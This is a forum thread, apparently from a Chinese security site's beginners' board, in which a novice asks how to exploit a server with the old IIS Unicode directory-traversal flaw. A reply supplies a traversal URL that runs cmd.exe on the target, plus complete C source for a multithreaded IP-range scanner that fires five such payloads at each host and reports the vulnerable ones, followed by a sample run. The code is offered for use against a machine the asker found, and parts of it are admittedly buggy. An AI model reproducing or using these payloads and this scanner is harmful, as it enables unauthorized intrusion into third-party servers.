|
 | 作者: staiyin [staiyin]
 论坛用户 |
登录 |
| 刚开始学习,找到了一台有IIS编码解码漏洞的机器,却不知道如何下手。还望大虾指点 |
| 地主 发表时间: 04-10-09 01:59 |
 | 回复: yourfather [yourfather] 论坛用户 |
登录 |
|
!!!!! http://xxxxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 即出现的IIS吗,以及相应的目录结构 相应源码: #include <stdio.h> #include <stdlib.h> #include <winsock2.h> #pragma comment(lib,"ws2_32.lib") DWORD WINAPI scan(LPVOID lp); #define ScanSpeed 100 #define MaxThread 20 void usage(char *file){ printf("\n\n----------------------------------------"); printf("\n Code By JsuFcz -- xxxxxx.net"); printf("\n USAGE:%s [minip] [maxip] [port]",file); printf("\n----------------------------------------\n\n"); } void checkerror(int code,char *msg){ if(code==-1){ printf("\n%s error:%d",msg,GetLastError()); exit(-1); } } typedef struct{ char ip[20]; int port; }infor; int threadcount; int findcount; static char unicode[][100]={ "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0", "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0", "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0", "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0", "GET /scripts/..%c1%09../winnt/system32/cmd.exe?/c+dir HTTP/1.0", "end" }; void main(int argc,char *argv[]){ WSADATA wsa; char minip[20]; char maxip[20]; char min_ip[4][4]; char max_ip[4][4]; int i,j,k,l; int place1,place2; int ret; infor infor1; char nowip[4][4]; HANDLE h; if(argc!=4){ usage(argv[0]); exit(-1); } ret=WSAStartup(0x0202,&wsa); checkerror(ret,"WSAStartup()"); strcpy(minip,argv[1]); strcpy(maxip,argv[2]); place1=place2=0; j=0; for(i=0;minip!='\0';i++){ if(minip=='.'){ place2=i; memcpy(&min_ip[j][0],&minip[place1],place2-place1); min_ip[j++][place2-place1]='\0'; place1=place2+1; } } place2=i; memcpy(&min_ip[j][0],&minip[place1],place2-place1); min_ip[j][place2-place1]='\0'; place1=place2=0; j=0; for(i=0;maxip!='\0';i++){ if(maxip=='.'){ place2=i; memcpy(&max_ip[j][0],&maxip[place1],place2-place1); max_ip[j++][place2-place1]='\0'; place1=place2+1; } } place2=i; memcpy(&max_ip[j][0],&maxip[place1],place2-place1); max_ip[j][place2-place1]='\0'; threadcount=0; findcount=0; for(i=atoi(&min_ip[0][0]);i<=atoi(&max_ip[0][0]);i++){ for(j=atoi(&min_ip[1][0]);j<=atoi(&max_ip[1][0]);j++){ for(k=atoi(&min_ip[2][0]);k<=atoi(&max_ip[2][0]);k++){ for(l=atoi(&min_ip[3][0]);l<=atoi(&max_ip[3][0]);l++){ itoa(i,&nowip[0][0],10); itoa(j,&nowip[1][0],10); itoa(k,&nowip[2][0],10); itoa(l,&nowip[3][0],10); strcpy(infor1.ip,&nowip[0][0]);strcat(infor1.ip,"."); strcat(infor1.ip,&nowip[1][0]);strcat(infor1.ip,"."); strcat(infor1.ip,&nowip[2][0]);strcat(infor1.ip,"."); strcat(infor1.ip,&nowip[3][0]); infor1.port=atoi(argv[3]); while(threadcount>=MaxThread) Sleep(ScanSpeed); //线程满的话,延迟一个ScanSpeed周期 h=CreateThread(NULL,NULL,scan,&infor1,NULL,NULL); if(h==NULL){ printf("\nCreateThread error!"); WaitForSingleObject(h,INFINITE); } Sleep(ScanSpeed); } } } } printf("\n\nScan End! Find HostCount:%d",findcount); } DWORD WINAPI scan(LPVOID lp){ struct sockaddr_in sin; SOCKET sock; infor *lpinfor=(infor*)lp; int ntime; char recvbuf[1024]; char sendbuf[1024]; char recvstr[1024]={0}; int ret; int i; BOOL flag=FALSE; threadcount++; sock=socket(AF_INET,SOCK_STREAM,0); checkerror(sock,"socket()"); ntime=10000; ret=setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)&ntime,sizeof(ntime)); checkerror(ret,"SO_SNDTIMEO"); memset(&sin,0,sizeof(sin)); sin.sin_family=AF_INET; sin.sin_addr.s_addr=inet_addr(lpinfor->ip); sin.sin_port=htons(lpinfor->port); ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin)); if(ret==SOCKET_ERROR) return(0); for(i=0;i<=4;i++){ strcpy(sendbuf,unicode); strcat(sendbuf," \n\n"); send(sock,sendbuf,sizeof(sendbuf),0); strcpy(recvstr,"RCV:\0"); while(ret=recv(sock,recvbuf,sizeof(recvbuf),0)){ recvbuf[ret]='\0'; strcat(recvstr,recvbuf); } if(strstr(recvstr,"HTTP/1.1 200 OK")){ if(flag==FALSE){ flag=TRUE; findcount++; } printf("\nHost %s -> %d Unicode:%s",(char*)inet_ntoa(sin.sin_addr),ntohs(sin.sin_port),unicode); } memset(recvbuf,0,sizeof(recvbuf)); memset(recvstr,0,sizeof(recvstr)); memset(sendbuf,0,sizeof(sendbuf)); ret=-1; } closesocket(sock); threadcount--; printf(" END"); return 0; } 在子线程中可能存在一点运行中的问题,哪个朋友能帮忙找出来的话,别忘了告诉我啊 下面是在我机上的运行过程 [xxxxxxx.net]#uniscan 10.0.0.168 10.0.0.168 80 Host 10.0.0.168 -> 80 Unicode:GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Scan End! Find HostCount:1 [此贴被 黑玫瑰姥的爸(yourfather) 在 10月09日02时11分 编辑过] [此贴被 黑玫瑰姥的爸(yourfather) 在 10月09日02时14分 编辑过] [此贴被 黑玫瑰姥的爸(yourfather) 在 10月09日02时14分 编辑过] [此贴被 黑玫瑰姥的爸(yourfather) 在 10月09日02时35分 编辑过] [此贴被 黑玫瑰姥的爸(yourfather) 在 10月09日02时36分 编辑过] |
| B1层 发表时间: 04-10-09 02:11 |
| 回复: staiyin [staiyin] 论坛用户 |
登录 |
|
可是我输入如上地址显示的页面是:页面不存在/ 是不是被过滤了 |
| B2层 发表时间: 04-10-09 13:04 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 哪位指点迷津